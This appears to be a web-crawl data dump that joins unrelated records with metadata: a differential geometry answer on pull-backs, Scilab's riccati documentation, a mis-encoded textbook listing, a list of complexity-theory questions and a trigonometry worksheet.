x^\\mu} \\frac{\\partial}{\\partial z^\\nu}\\right\\vert_{\\phi(p)} \\in TN_{\\phi(p)}$$ Take care that you can't push forward a vector field unless $$\\phi_* X$$ is 1-1.This is why the book says \"diffeomorphism\" rather than a general map. You can, however, always pull back a form even when $$\\phi$$ is not 1-1.\n\nIf, for example, $$\\eta=\\eta_\\mu(z) dz^\\mu \\in \\Lambda^1 (T^*N)$$ and the map $$\\phi: M\\to N$$ takes $$x\\mapsto z(x)$$ then $$\\phi^* \\eta= \\eta_\\mu(z(x)) d(z^\\mu(x))= \\eta_\\mu(z(x)) \\frac{\\partial z^\\mu}{\\partial x^\\nu}dx^\\nu\\in \\Lambda^1 (T^* M)$$\n\nThere is no real \"proof\" here, just the use of the chain-rule $$dz^\\mu = \\frac{\\partial z^\\mu}{\\partial x^\\nu}dx^\\nu$$ to transcribe into a specific coordinate system the statement of the definition. You can, however, use the explicit formula for the push-forward of a vector to check that this recipe is consistent with the coordinate free langauge\n\nI think, conventionally the pull-back is defined as adjoint to push-forward. So if you have a manifold $$\\bar{\\mathcal{M}}$$, and manifold $$\\mathcal{M}$$ (possibly the same manifold). You then need a map $$\\Phi:\\bar{\\mathcal{M}}\\to\\mathcal{M}$$, such that $$x^{\\left(i\\right)}=\\Phi^{\\left(i\\right)}\\left(\\bar{x}\\right)$$.\n\nBased on this you can define a push-foward $$\\phi: T_\\bar{p} \\bar{\\mathcal{M}}\\to T_{\\Phi\\left(\\bar{p}\\right)}\\mathcal{M}$$, such that\n\n$$\\phi\\left(\\bar{A}^i \\bar{\\partial}_i\\right)=\\bar{A}^i \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}} \\partial_k$$\n\nNow you can also define forms on both manifolds, i.e. $$\\omega \\in T_p \\mathcal{M}^*$$, $$\\omega: T_p \\mathcal{M}\\to\\mathbb{R}$$, and same for $$\\bar{\\omega} \\in T_p \\bar{\\mathcal{M}}^*$$. It is convenient to use the following notation for the action of the form $$\\omega$$ one the vector $$A$$:\n\n$$\\langle \\omega | A\\rangle = \\omega\\left(A\\right)=\\omega_i A^i$$\n\nYou can then ask what is the result of applying the form to the push-forwarded vector:\n\n$$\\langle \\omega | \\phi \\bar{A}\\rangle = \\omega_k \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}}\\bar{A}^i$$\n\nFinally you can define the adjoint to the push-forward, the pull-back, as:\n\n$$\\langle \\omega | \\phi \\bar{A}\\rangle = \\langle \\phi^* \\omega | \\bar{A}\\rangle = \\omega_k \\frac{\\partial \\Phi^{(k)}}{\\partial \\bar{x}^{(i)}}\\bar{A}^i$$\n\nWhere the induced pull-back is $$\\phi^*: T_{\\Phi\\left(\\bar{p}\\right)}\\mathcal{M}^* \\to T_{\\bar{p}}\\mathcal{\\bar{M}}^*$$, and $$\\phi^*\\left(\\omega_i dx^i\\right)=\\omega_i \\frac{\\partial\\Phi^{(i)}}{\\partial\\bar{x}^{(k)}} d\\bar{x}^k$$\n\nOften there is abuse of notation, where one says $$x^{(i)}=x^{(i)}\\left(\\bar{x}\\right)$$ (dropping $$\\Phi$$)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6785792,"math_prob":1.0000025,"size":1082,"snap":"2019-43-2019-47","text_gpt3_token_len":406,"char_repetition_ratio":0.14100185,"word_repetition_ratio":0.0,"special_character_ratio":0.4168207,"punctuation_ratio":0.065727696,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000091,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T07:17:58Z\",\"WARC-Record-ID\":\"<urn:uuid:88835b44-2bc7-4aa2-a022-236ecf0c746b>\",\"Content-Length\":\"149627\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3492da79-6b6b-44f8-a672-8d1e4d638c5b>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b9b7354-1628-4193-8fc9-89a5a725b720>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/3118306/action-of-a-1-form-on-the-push-forward-and-pull-back-of-a-vector\",\"WARC-Payload-Digest\":\"sha1:M4THVYWLZICH2EPDJ42O3236GB2BPNOB\",\"WARC-Block-Digest\":\"sha1:GOZIDMFJE2DK6GE3N2CJKDUDNT7PCJWW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986692126.27_warc_CC-MAIN-20191019063516-20191019091016-00354.warc.gz\"}"}
https://help.scilab.org/docs/6.0.1/en_US/riccati.html
[ "Scilab Home page | Wiki | Bug tracker | Forge | Mailing list archives | ATOMS | File exchange\nChange language to: Français - Português - 日本語 - Русский\n\nSee the recommended documentation of this function\n\n# riccati\n\nRiccati equation\n\n### Syntax\n\n```X=riccati(A,B,C,dom,[typ])\n[X1,X2]=riccati(A,B,C,dom,[typ])```\n\n### Arguments\n\nA,B,C\n\nreal matrices nxn, `B` and `C` symmetric.\n\ndom\n\n`'c'` or `'d'` for the time domain (continuous or discrete)\n\ntyp\n\nstring : `'eigen'` for block diagonalization or `schur'` for Schur method.\n\nX1,X2,X\n\nsquare real matrices (X2 invertible), X symmetric\n\n### Description\n\n`X=riccati(A,B,C,dom,[typ])` solves the Riccati equation:\n\n`A'*X+X*A-X*B*X+C=0`\n\nin continuous time case, or:\n\n`A'*X*A-(A'*X*B1/(B2+B1'*X*B1))*(B1'*X*A)+C-X`\n\nwith `B=B1/B2*B1'` in the discrete time case. If called with two output arguments, `riccati` returns `X1,X2` such that `X=X1/X2`.\n\n### Examples\n\n```// Continuous\nn = 10;\nA = rand(n,n);\nB = rand(n,n);\nC = rand(n,n);\nC = C*C';\nR = rand(n,n);\nR = R*R'+eye();\nB = B*inv(R)*B';\n\nX = riccati(A,B,C,'c','eigen')```\n```// Discrete\n\nn = 10;\nF = rand(n,n);\nG1 = rand(n,n);\nG2 = rand(n,n);\nG2 = G2*G2'+eye();\nG = G1/G2*G1';\nH = rand(n,n);\nH = H*H';\n\n[X1,X2]= riccati(F,G,H,'d','schur')```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5232772,"math_prob":0.9974532,"size":1001,"snap":"2020-45-2020-50","text_gpt3_token_len":353,"char_repetition_ratio":0.118355066,"word_repetition_ratio":0.0,"special_character_ratio":0.32567433,"punctuation_ratio":0.20784314,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995715,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-05T12:41:22Z\",\"WARC-Record-ID\":\"<urn:uuid:42dff9a4-24dc-46b5-ad39-128bea3b0a39>\",\"Content-Length\":\"31899\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e15bed9c-e10c-4b06-97cd-882adeacff68>\",\"WARC-Concurrent-To\":\"<urn:uuid:07553727-7928-4b1c-86fa-cf0657616402>\",\"WARC-IP-Address\":\"176.9.3.186\",\"WARC-Target-URI\":\"https://help.scilab.org/docs/6.0.1/en_US/riccati.html\",\"WARC-Payload-Digest\":\"sha1:UVH4MP43TNLDEYGG6QMYCYWKVCGIY33V\",\"WARC-Block-Digest\":\"sha1:WOUAEKG64ESNQSWYXOWUP237UZHD3VQP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141747774.97_warc_CC-MAIN-20201205104937-20201205134937-00485.warc.gz\"}"}
https://books.google.gr/books?id=dgMAAAAAYAAJ&hl=el&lr=
[ "### тИ КщМЕ ОИ ВЯчСТЕР -сЩМТАНГ ЙЯИТИЙчР\n\nдЕМ ЕМТОПъСАЛЕ ЙЯИТИЙщР СТИР СУМчХЕИР ТОПОХЕСъЕР.\n\n### пЕЯИЕВЭЛЕМА\n\n PART I 7 Factors and Divisors 37 Fractions 44 Problems for Analysis 84 Decimal Fractions 90 Practical Measurements 123 Percentage 141 Interest 151\n Banks and Banking 303 Square Root 361 307 Stocks and Bonds 324 Ratio and Proportion Metric System 338 Problems for Oral and written 345 Similar Surfaces 376 Ratio and Proportion 337 Metric System 382 Simple Proportion 338 406 Problems for Oral and written 421\n\n Denominate Numbers 175 Review Problems 188 Percentage 236 work 300 36 301\n Powers and Roots 358 Reference Tables 433 Longitude and Time 319 Compound Proportio 438 78 439 Bills and Accounts 166 Receipted Bills 446 пМЕУЛАТИЙэ ДИЙАИЧЛАТА\n\n### дГЛОЖИКч АПОСПэСЛАТА\n\nсЕКъДА 128 - CUBIC MEASURE 1728 cubic inches (cu. in.) = 1 cubic foot (cu. ft.) 27 cubic feet = 1 cubic yard (cu. yd.) 128 cubic feet = 1 cord (cd...\nсЕКъДА 203 - A Circle is a plane figure bounded by a curved line every point of which is equally distant from a point within called the center.\nсЕКъДА 122 - Square Measure 144 square inches (sq. in.) = 1 square foot (sq. ft.) 9 square feet = 1 square yard (sq.\nсЕКъДА 417 - Troy Weight 24 grains = 1 pennyweight. 20 pennyweights = 1 ounce. 12 ounces = 1 pound.\nсЕКъДА 3 - Arithmetic is the science of numbers, and the art of computing by them.\nсЕКъДА 418 - United States Money 10 mills = 1 cent 10 cents = 1 dime 10 dimes = 1 dollar 10 dollars = 1 eagle The unit of English money is the pound.\nсЕКъДА 20 - Multiplication is the process of taking one number as many times as there are units in another number.\nсЕКъДА 15 - Subtraction Subtraction is the process of finding the difference between two numbers, or of finding what number must be added to a given number to equal a given sum.\nсЕКъДА 125 - The Altitude of a triangle is the perpendicular distance from the angle opposite the base to the base, or to the base produced or extended.\nсЕКъДА 353 - A sphere is a solid bounded by a curved surface, every point of which is equally distant from a point within called the center." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7253687,"math_prob":0.9853471,"size":2381,"snap":"2020-24-2020-29","text_gpt3_token_len":750,"char_repetition_ratio":0.105174586,"word_repetition_ratio":0.048661802,"special_character_ratio":0.24569508,"punctuation_ratio":0.071599044,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9903199,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-12T12:49:43Z\",\"WARC-Record-ID\":\"<urn:uuid:d6932095-1c8c-421d-8e67-484415e5a56d>\",\"Content-Length\":\"69673\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:222a1c87-cb41-4193-9022-2c599fa122ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:dbe38010-1e2a-4c5c-b251-e152723f8ebc>\",\"WARC-IP-Address\":\"172.217.7.238\",\"WARC-Target-URI\":\"https://books.google.gr/books?id=dgMAAAAAYAAJ&hl=el&lr=\",\"WARC-Payload-Digest\":\"sha1:L6WEXMOZJ5RNIF4FFX3APIR6FEJEJLGY\",\"WARC-Block-Digest\":\"sha1:3TA6GQKJJFUHIYOYZGCPLXXZLXISCHM3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657138718.61_warc_CC-MAIN-20200712113546-20200712143546-00389.warc.gz\"}"}
https://cstheory.stackexchange.com/questions/tagged/cc.complexity-theory?sort=newest&page=50
[ "Questions tagged [cc.complexity-theory]\n\nP versus NP and other resource-bounded computation.\n\n2,620 questions\nFilter by\nSorted by\nTagged with\n239 views\n\nIs there a natural restriction of VO logic which captures P or NP?\n\nThe paper Lauri Hella and José María Turull-Torres, Computing queries with higher-order logics, TCS 355 197–214, 2006. doi: 10.1016/j.tcs.2006.01.009 proposes logic VO, variable-order logic. This ...\n727 views\n\nCommunication complexity for deciding associativity\n\nLet $S=${$0,...,n-1$} and $\\circ : S \\times S \\rightarrow S$. I want to compute the communication complexity of deciding whether $\\circ$ is associative. The model is the following. $\\circ$ is given ...\n2k views\n\nEasy decision problem, hard search problem\n\nDeciding whether a Nash equilibrium exists is easy (it always does); however, actually finding one is believed to be difficult (it is PPAD-Complete). What are some other examples of problems where ...\n718 views\n\nIs $AC^0$ with bounded fanout weaker than $AC^0$?\n\nIn the survey \"Small Depth Quantum Circuits\" by D. Bera, F. Green and S. Homer (p. 36 of ACM SIGACT News, June 2007 vol. 38, no. 2), I read the following sentence: The classical version of $QAC^0$ (...\n834 views\n\nWhat are the current best known upper and lower bounds on the (un)satisfiability threshold for random k-sat and/or 3-sat?\n\nI would like to know the current state of the phase transition for random k-sat, given n variables and m clauses, what is the best known c=m/n for upper and lower bounds.\n2k views\n\nComplexity of exponential function\n\nWe know that the exponential function $\\exp(x,y) = x^y$ over natural numbers is not computable in polynomial time, because the size of the output is not polynomially bounded in the size of the inputs. ...\n382 views\n\nCobham's Result on Efficient Computations\n\nIn the following paper: Alan Cobham (1965), \"The intrinsic computational difficulty of functions\", Proc. Logic, Methodology, and Philosophy of Science II, North Holland. Cobham defined the class P ...\n1k views\n\nSeparating Logspace from Polynomial time\n\nIt is clear that any problem that is decidable in deterministic logspace ($L$) runs in at most polynomial time ($P$). There is a wealth of complexity classes between $L$ and $P$. Examples include $NL$,...\n2k views\n\nAlternative proofs of Schwartz–Zippel lemma\n\nI'm only aware of two proofs of Schwartz–Zippel lemma. The first (more common) proof is described in the wikipedia entry. The second proof was discovered by Dana Moshkovitz. Are there any other ...\n1k views\n\nReferences on Circuit Lower Bounds\n\nPreamble Interactive proof systems and Arthur-Merlin protocols were introduced by Goldwasser, Micali and Rackoff and Babai back in 1985. At first, it was thought that the former is more powerful than ...\n424 views\n\nSimple question about decision problems\n\n(I am in the middle of my first theoretical cs course, so I apologize in advance for what is probably a stupid question.) So, we say that some language L is in P, which means that a Turing machine ...\n395 views\n\nIs there any sparse language known to be in NPI under the $P \\neq NP$ assumption ?\n\nI wonder to know wether there are sparse language (even constructed by delayed diagolanization) in NPI under the assumption that $P \\neq NP$.\n2k views\n\nIs Gap-3SAT NP-complete even for 3CNF formulas where no pair of variables appears in significantly more clauses than the average?\n\nIn this question, a 3CNF formula means a CNF formula where each clause involves exactly three distinct variables. For a constant 0<s<1, Gap-3SATs is the following promise problem: Gap-3SATs ...\n326 views\n\nSeparation of limited nondeterminism classes?\n\nIt is interesting to find the best lower bound on the number of nondeterministic bits needed to solve satisfiability problem. Let $\\beta_k P$ be the class of problems solvable by a nondeterministic ...\n984 views\n\nWhat is the best way to get a close-to-fair coin toss from identical biased coins?\n\n(Von Neumann gave an algorithm that simulates a fair coin given access to identical biased coins. The algorithm potentially requires an infinite number of coins (although in expectation, finitely many ...\n373 views\n\nRelativization with Respect to Non-Recursive Oracles\n\nIn the paper Relativizations of the P = ? NP Question, Baker et al. showed that there are relativized worlds in which either P = NP or P ≠ NP holds. All oracles in their settings were recursive sets. ...\n280 views\n\nComplexity of advice language?\n\nLet $L$ be a language in P/poly. There is then a deterministic polynomial-time Turing machine $M$ with polynomial-sized advice that decides $L$. Consider the language $A(M)$ of all advice strings ...\n281 views\n\nIs there known any complexity class containing online counterparts of optimization problems?\n\nIs there known any complexity class containing online counterparts of optimization problems? If not, then how such class can be defined? We know that many problems have their online version: e.g. ...\n1k views\n\n340 views\n\nComplexity of finding vectors with optimal projection?\n\nInput: a set $T$ of vectors $v_i=(x_i,y_i,z_i)$. Where $x_i,y_i,z_i$ are integers. Output: a subset of vectors $v_1,v_2,...,v_n$ with vector addition $m=\\sum v_i$ such that the projection of $m$ on ...\n1k views\n\nWhat is known about the complexity of finding minimum circuits for SAT?\n\nWhat is known about the complexity of finding minimal circuits that compute SAT up to length $n$? More formally: what is the complexity of a function which, given $1^{n}$ as input outputs a minimal ...\n783 views\n\nComplexity Classes for Cases Other Than “Worst Case”\n\nDo we have complexity classes with respect to, say, average-case complexity? For instance, is there a (named) complexity class for problems which take expected polynomial time to decide? Another ...\n914 views\n\nBarriers and Monotone Circuit Complexity\n\nNatural proofs is a barrier towards proving lower bounds on the circuit complexity of boolean functions. They do not directly imply any such barrier in proving lower bounds on the $monotone$ circuit ...\n412 views\n\nExhausting Simulator of Zero-Knowledge Protocols in the Random Oracle Model\n\nIn a paper titled \"On Deniability in the Common Reference String and Random Oracle Model,\" Rafael Pass writes: We note that when proving security according to the standard zero-knowledge definition ...\n452 views\n\nUnderstanding QMA\n\nThis question comes out of an answer Joe Fitzsimons gave to a different question. Most natural complexity classes have a one-line \"intuitive description\" that helps characterize core problems in that ...\n657 views\n\nHardness of parameterized CLIQUE?\n\nLet $0\\le p\\le 1$ and consider the decision problem CLIQUE$_p$ Input: integer $s$, graph $G$ with $t$ vertices and $\\lceil p\\binom{t}{2} \\rceil$ edges Question: does $G$ contain a clique on at ...\n487 views\n\nAlgorithms and computational complexity of clique and biclique covers\n\nI've been reading a paper by a mathematical chemist. He proposes some indices to measure the complexity of molecules. From here on in, instead of molecules, think undirected connected graphs: a ...\n3k views\n\nIntractability of NP-complete problems as a principle of physics?\n\nI'm always intrigued by the lack of numerical evidence from experimental mathematics for or against the P vs NP question. While the Riemann Hypothesis has some supporting evidence from numerical ...\n495 views\n\nIs embedding a solution feasible for SAT?\n\nI am interested in \"hard\" individual instances of NP-complete problems. Ryan Williams discussed the SAT0 problem at Richard Lipton's blog. SAT0 asks whether a SAT instance has the specific solution ...\n505 views\n\nDo the proofs that permanent is not in uniform $\\mathsf{TC^0}$ relativize?\n\nThis is a follow up to this question, and is related to this question of Shiva Kinali. It seems that the proofs in these papers (Allender, Caussinus-McKenzie-Therien-Vollmer, Koiran-Perifel) use ...\n2k views\n\nProofs, Barriers and P vs NP\n\nIt is well known that any proof resolving the P vs NP question must overcome relativization, natural proofs and algebrization barriers. The following diagram partitions the \"proof space\" into ...\n304 views\n\nAre there any classes of functions which require provably different resources to compute versus computing their inverse?\n\nApologies in advance if this question is too simple. Basically, what I want to know is if there are any functions $f(x)$ with the following properties: Take $f_n(x)$ to be $f(x)$ when the domain and ...\n416 views\n\nResults showing existence/non-existence of finite graphs with specific computable properties imply certain complexity results\n\nAre there any known results showing that existence (or non-existence) of finite graphs with specific computable properties imply certain complexity results (such as P = NP)? Here's one completely ...\nTree width measures how close a graph is to a tree. It is NP-hard to compute tree width. The best known approximation algorithm achieves $O(\\sqrt{{\\log}n})$ factor. Courcelle's theorem states that ...\nIs there any relationship between the number of vertex covers of a graph $G$ and the permanent of $G$'s adjacency matrix?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89520127,"math_prob":0.95167124,"size":14034,"snap":"2019-43-2019-47","text_gpt3_token_len":3458,"char_repetition_ratio":0.14226657,"word_repetition_ratio":0.023266219,"special_character_ratio":0.24269632,"punctuation_ratio":0.12914157,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99737245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T06:24:06Z\",\"WARC-Record-ID\":\"<urn:uuid:4989203d-254b-4fbe-a1d9-e6a77ecad06f>\",\"Content-Length\":\"260643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:62b7cb6f-a277-4398-b06f-4494d7f1a629>\",\"WARC-Concurrent-To\":\"<urn:uuid:74519777-fa3b-429d-8abe-40820e754634>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://cstheory.stackexchange.com/questions/tagged/cc.complexity-theory?sort=newest&page=50\",\"WARC-Payload-Digest\":\"sha1:KEN4MR45NY2Y3SWWZC5KWAFWGJBGC44M\",\"WARC-Block-Digest\":\"sha1:V4AJUR2EMHNVZSNRISZBZQZXRR5MXH5B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986657586.16_warc_CC-MAIN-20191015055525-20191015083025-00294.warc.gz\"}"}
http://www.icoachmath.com/topics/Geometry/Law-of-Sines-and-Cosines-to-Solve-Triangles.html
[ "#### Solved Examples and Worksheet for Law of Sines and Cosines to Solve Triangles\n\nQ1In triangle ABC, if a = 4, b = 3, and c = 5, then find the measure of the angle opposite to the longest side to the nearest degree.\n\nA. 0o\nB. 45o\nC. 90o\nD. 60o\n\nStep: 1\nThe length c is longer side and the angle opposite to it is angle C.\nStep: 2\nCos C = 42+32-522(4)(3)\n[Use law of cosines:\nCos C = a2+b2-c22ab.]\nStep: 3\nCos C = 024 = 0\nStep: 4\nC = 90o\nQ2In triangle DEF, if d = 6, e = 15, and f = 22, then find the measure of angle D to the nearest degree.\nA. 70o\nB. 60o\nC. 80o\nD. not possible to find\n\nStep: 1\nd2 = e2 + f2 - 2ef cos D.\n[Law of Cosines.]\nStep: 2\nCos D = e2+f2-d22ef.\nStep: 3\nCos D = 152+222-622(15)(22)\nStep: 4\nCos D 1.019696\nStep: 5\nD is not possible. Since the cosine of an angle cannot be greater than one.\nStep: 6\nTriangle cannot be drawn with the given sides.\nCorrect Answer is :   not possible to find\nQ3In ΔDEF, if d = 19, e = 19 and f = 20, then find F to the nearest degree.", null, "A. 26o\nB. 66o\nC. 68o\nD. 64o\n\nStep: 1\nCos F = 192+192 -2022(19)(19)\n[Use law of cosines:\nCos F = d2+e2-f22de.]\nStep: 2\nCos F 0.446\nStep: 3\nF 64°\nQ4In ΔPQR, if Q = 75o, p = 12, q = 17, then find the measure of the angle R to the nearest degree.", null, "A. 75o\nB. 137o\nC. 43o\nD. 62o\n\nStep: 1\nSin 75o17 = Sin P12\n[Use law of Sines: Sin Qq = Sin Pp .]\nStep: 2\nSin P = 12 Sin 75o17\nStep: 3\nSin P = 0.68\nStep: 4\nP = 43o (or) 137o\nStep: 5\nThe measure of 137o is not possible, since 137o + 75o = 212o and 212o is greater than 180o.\nStep: 6\nSo, P = 43o.\nStep: 7\nR = 180 - (75o + 43o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nR = 62o\nQ5A point A is c cm from B and b cm from C as shown in the figure. If ABC is xo, then find the distance between B and C.\n[b = 14, c = 20, x = 50,y = 30.]", null, "A. 21.7 cm\nB. 16.1 cm\nC. 34.3 cm\nD. 15.5 cm\n\nStep: 1\nBC2 = AB2 + AC2 - 2(AB)(AC)) cosBAC\n[Use law of Cosines.]\nStep: 2\nBC2 = 142 + 202 - 2(14)(20) cos 50o30'\nStep: 3\nBC2 239.796320\n[Simplify.]\nStep: 4\nBC = 15.5\n[Simplify.]\nStep: 5\nThe distance between B and C is 15.5 cm.\nCorrect Answer is :   15.5 cm\nQ6In ΔABC, if B = 64o, C = 64o, and b = 26 units, then find the length of a.\n\nA. 23 units\nB. 26 units\nC. 20 units\nD. 30 units\n\nStep: 1\nA = 180o - (64o + 64o)\n[Sum of the measures of angles in a triangle is 180o.]", null, "Step: 2\nA = 52o\nStep: 3\nsin 52oa = sin 64o26\n[Use law of sines: sin Aa = sin Bb.]\nStep: 4\na = 26 sin 52osin 64o = 23 units, to two significant digits.\n[Simplify.]\nCorrect Answer is :   23 units\nQ7In triangle DEF, if D = 45°, f = 11, and e = 9, then find the length of d.[Round it to the nearest whole number].", null, "A. 21\nB. 10\nC. 13\nD. 8\n\nStep: 1\nd2 = 112 + 92 - 2(11)(9) cos 45°\n[Using law of cosines:\nd2 = e2 + f2 - 2ef cos D.]\nStep: 2\nd2 62.014\nStep: 3\nd = 8.\n[Simplify using calculator.]\nQ8In ΔDEF, if d = 28, e = 28, and f = 35, then find F to the nearest degree.", null, "A. 13°\nB. 77°\nC. 81°\nD. 83°\n\nStep: 1\nCos F = 282+282-3522(28)(28)\n[Use law of cosines:\nCos F = d2+e2-f22de.]\nStep: 2\nCos F 0.2188\nStep: 3\nF 77°\nQ9In ΔABC, if ∠A = 62°, a = 14 in., b = 8 in., then find the length of c to the nearest two significant digits.", null, "A. 14 in.\nB. 24 in.\nC. 17 in.\nD. 16 in.\n\nStep: 1\nsin 62°14 = sin B8\n[Use law of Sines: sin Aa = sin Bb.]\nStep: 2\nsin B = 8 sin 62°14\nStep: 3\nsin B = 0.50\n[Simplify.]\nStep: 4\n∠B = 30° or 150°\nStep: 5\nThe measure of 150° is not possible, since 150° + 62° = 212° and 212° is greater than 180°.\nStep: 6\nSo, ∠B = 30°.\nStep: 7\n∠C = 180° - (62° + 30°) = 88°\nStep: 8\nsin 88°c = sin 62°14\n[Use law of Sines: sin Cc = sin Aa.]\nStep: 9\nc = 14 sin 88°sin 62° = 16 in.\nCorrect Answer is :   16 in.\nQ10In ΔPQR, if Q = 68°, p = 17 units, and q = 23 units, then what is the measure of R to the nearest degree?", null, "A. 72°\nB. 44°\nC. 61°\nD. 68°\n\nStep: 1\nSin P17 = Sin 68°23\n[Use law of Sines : sin Pp = sin Qq .]\nStep: 2\nSin P = 17 Sin 68°23\nStep: 3\nSin P = 0.7\n[Simplify.]\nStep: 4\nP = 44° (or) P = 136°\nStep: 5\nThe measure of 136° is not possible, since 136° + 68° = 204° and 204° is greater than 180°.\nStep: 6\nSo, P = 44°.\nStep: 7\nR = 180 - (68o + 44o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nR = 68o\nQ11In ΔABC, if C = 73o, a = 11 units, c = 17 units, then find B to the nearest degree.\nA. 38o\nB. 59o\nC. 142o\nD. 69o\n\nStep: 1\nsin A11 = sin 73o17\n[Use law of Sines: sin Aa = sin Cc .]", null, "Step: 2\nsin A = 11 sin 73o17\nStep: 3\nsin A = 0.62\nStep: 4\nA = 38o (or) 142o\nStep: 5\nThe measure of 142o is not possible, since 142o + 73o = 215o and 215o is greater than 180o.\nStep: 6\nSo, A = 38o.\nStep: 7\nB = 180 - (38o + 73o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nB = 69o\nQ12In triangle DEF, D = θ = 35°44′, e = 12.5 units, and f = 17.4 units. What is the length d to four significant digits?", null, "A. 15.42\nB. 10.29\nC. 10.2637\nD. 20.412\n\nStep: 1\nd2 = 12.52 + 17.42 - 2(12.5)(17.4) cos 35°44′\n[Use law of cosines:\nd2 = e2 + f2 - 2ef cos D.]\nStep: 2\nd2 ≈ 105.901\nStep: 3\nd = 10.29, to four significant digits" ]
[ null, "http://qimg.icoachmath.com/qd/50001-55000/53490.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53639.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53750.gif", null, "http://qimg.icoachmath.com/qs/125001-150000/135606_23620.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53780.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53801.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81211.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81381.gif", null, "http://qimg.icoachmath.com/qs/200001-225000/211821_33817.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81382.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.618762,"math_prob":0.9996995,"size":416,"snap":"2020-10-2020-16","text_gpt3_token_len":209,"char_repetition_ratio":0.1723301,"word_repetition_ratio":0.02,"special_character_ratio":0.55528843,"punctuation_ratio":0.17699115,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999335,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-20T18:01:15Z\",\"WARC-Record-ID\":\"<urn:uuid:d77e4812-98f2-4e95-81e5-5c06f9e0a72c>\",\"Content-Length\":\"63287\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:938f30fe-9a0c-4708-ae7c-d725e8b10612>\",\"WARC-Concurrent-To\":\"<urn:uuid:4e9a843c-125a-4815-b583-506c43c4df43>\",\"WARC-IP-Address\":\"52.52.93.178\",\"WARC-Target-URI\":\"http://www.icoachmath.com/topics/Geometry/Law-of-Sines-and-Cosines-to-Solve-Triangles.html\",\"WARC-Payload-Digest\":\"sha1:SN7T77VBXVNNM7TLL54WDALJHO3XXMO7\",\"WARC-Block-Digest\":\"sha1:O25SFL4RFJOOLAUS5M2WRPGY4IB63VWK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145260.40_warc_CC-MAIN-20200220162309-20200220192309-00528.warc.gz\"}"}
https://ch.mathworks.com/matlabcentral/answers/693465-clear-one-plot-in-multiple-hold-figure?s_tid=prof_contriblnk
